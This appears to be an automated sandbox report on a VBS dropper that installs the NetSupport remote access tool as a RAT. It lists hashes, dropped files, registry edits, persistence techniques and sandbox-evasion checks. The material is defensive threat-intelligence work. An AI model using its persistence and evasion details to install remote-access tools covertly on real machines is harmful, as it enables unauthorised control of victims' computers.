netsupport | 484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2024 02:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs
Size

8.4MB
MD5

c1108260f7a287cb16f93c11a40fbf90
SHA1

8eab07aef27baae17d1ce013cce58b2b43dcaa1d
SHA256

484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c
SHA512

59d3023cc0287ff45894bbcce2175c8fda7a36b2f1687ab7b93fb49a578e38f874587bed0e3d69eff1a20deb4f20fc27c1155026bd962d007c9b0e8c028edc0c
SSDEEP

49152:1uld2u6UP5rpZxEeMuatPwmOI06dzq5kz9zV7AujEy4q7YcGqaLjt1yLQ+RZyBvd:+P5j

Score

10^/10

netsupport discovery persistence privilege_escalation rat

Malware Config

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Netsupport family
netsupport

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1460	2828	cmd.exe	83

Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs

Processes:

484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe

description	pid	Process	procid_target
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56
PID 4788 created 3568	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	56

Blocklisted process makes network request 5 IoCs

Processes:

WScript.exemsiexec.exe

flow	pid	Process
16	4620	WScript.exe
19	4620	WScript.exe
21	4620	WScript.exe
40	3124	msiexec.exe
42	3124	msiexec.exe

Drops file in Drivers directory 2 IoCs

Processes:

winst64.exe

description	ioc	Process
File created	C:\Windows\system32\drivers\nskbfltr.sys	winst64.exe
File created	C:\Windows\system32\drivers\nskbfltr2.sys	winst64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

MSI6995.tmp

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\nskbfltr\ImagePath = "\\SystemRoot\\system32\\drivers\\nskbfltr.sys"	MSI6995.tmp

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exeWScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 11 IoCs

Processes:

484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exeMSI6065.tmpMSI6483.tmpcheckdvd.exeMSI6995.tmpwinst64.exeMSI706E.tmpclient32.exepcicfgui_client.exepcicfgui_client.execlient32.exe

pid	Process
4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
2452	MSI6065.tmp
952	MSI6483.tmp
644	checkdvd.exe
4080	MSI6995.tmp
4380	winst64.exe
4164	MSI706E.tmp
4524	client32.exe
2884	pcicfgui_client.exe
2588	pcicfgui_client.exe
624	client32.exe

Loads dropped DLL 64 IoCs

Processes:

MsiExec.exeMsiExec.exewinst64.exeMSI6995.tmpclient32.exepcicfgui_client.exe

pid	Process
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
2676	MsiExec.exe
1680	MsiExec.exe
1680	MsiExec.exe
1680	MsiExec.exe
1680	MsiExec.exe
4380	winst64.exe
4080	MSI6995.tmp
1680	MsiExec.exe
1680	MsiExec.exe
1680	MsiExec.exe
4524	client32.exe
4524	client32.exe
4524	client32.exe
4524	client32.exe
4524	client32.exe
4524	client32.exe
4524	client32.exe
4524	client32.exe
4524	client32.exe
4524	client32.exe
2676	MsiExec.exe
2884	pcicfgui_client.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.execlient32.exe

description	ioc	Process
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	client32.exe
File opened (read-only)	\??\B:	client32.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

MSI6995.tmp

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "0"	MSI6995.tmp

Drops file in System32 directory 8 IoCs

Processes:

client32.exeMSI6995.tmpwinst64.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	client32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	client32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	client32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	client32.exe
File created	C:\Windows\SysWOW64\pcimsg.dll	MSI6995.tmp
File opened for modification	C:\Windows\SysWOW64\pcimsg.dll	MSI6995.tmp
File created	C:\Windows\system32\client32provider.dll	winst64.exe
File opened for modification	C:\Windows\system32\client32provider.dll	winst64.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

pcicfgui_client.exe

pid	Process
2884	pcicfgui_client.exe
2884	pcicfgui_client.exe

Drops file in Program Files directory 64 IoCs

Processes:

msiexec.execlient32.exeMSI6995.tmp

description	ioc	Process
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\NSM.ini	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\Ofgaduse_HW_U1.bin	client32.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\bar.gif	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\toastMessage.png	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\logo.png	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dll	msiexec.exe
File opened for modification	C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini	MSI6995.tmp
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\gdihook5.cat	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\NSM.LIC	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\Ofgaduse_SW_U1.bin	client32.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\amberbar.gif	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\btn_down_grey.gif	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-filesystem-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\IsMetro.exe	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.inf	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\_Data.lnk	MSI6995.tmp
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exe	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\disk2.gif	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\redbar.gif	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-locale-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\video2.gif	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-math-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\_Shared Data.lnk	MSI6995.tmp
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\greenbar.gif	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\Inv\keyboard2.gif	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dll	msiexec.exe
File created	C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe	msiexec.exe

Drops file in Windows directory 64 IoCs

Processes:

msiexec.exeMSI6995.tmp

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI5D1C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6995.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5A54.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5A55.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C6F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C93.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5F98.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6483.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C4C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C4D.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI59B5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C80.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5CF9.tmp	msiexec.exe
File opened for modification	C:\Windows\setuperr.log	MSI6995.tmp
File opened for modification	C:\Windows\Installer\MSI5CB4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5D0B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5EA7.tmp	msiexec.exe
File created	C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exe	msiexec.exe
File created	C:\Windows\Installer\SourceHash{CBB68368-7767-4CFF-B3E5-211488346702}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C81.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5EC9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5CE9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI75AF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5EB9.tmp	msiexec.exe
File created	C:\Windows\Installer\e58533c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5CB5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5E47.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5D1D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5EB8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI63D4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6424.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI66B6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI59C5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5BDD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5D0A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI794B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5EA6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6F73.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e58533c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI58E9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5D2D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI62D8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6413.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5CD7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5F99.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6065.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5ECA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI792B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C6E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5CC5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5CD6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C5E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C92.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI795C.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6317.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6DAD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5CA3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5CE8.tmp	msiexec.exe
File opened for modification	C:\Windows\setupact.log	MSI6995.tmp
File opened for modification	C:\Windows\Installer\MSI62B7.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exeMsiExec.exeMSI6483.tmpclient32.execlient32.execscript.exemsiexec.exeMSI6065.tmppcicfgui_client.exeattrib.exeMSI6995.tmpWScript.exeMsiExec.execheckdvd.exeMSI706E.tmp

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSI6483.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSI6065.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pcicfgui_client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSI6995.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	checkdvd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSI706E.tmp

Checks SCSI registry key(s) 3 TTPs 24 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

client32.exe

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A	client32.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	client32.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	client32.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	client32.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	client32.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	client32.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A	client32.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	client32.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	client32.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	client32.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	client32.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	client32.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	client32.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	client32.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	client32.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	client32.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

client32.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	client32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	client32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

cscript.execlient32.exesvchost.exemsiexec.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	cscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\powrprof.dll,-11 = "Power saver"	client32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	cscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	cscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	cscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\powrprof.dll,-15 = "Balanced"	client32.exe
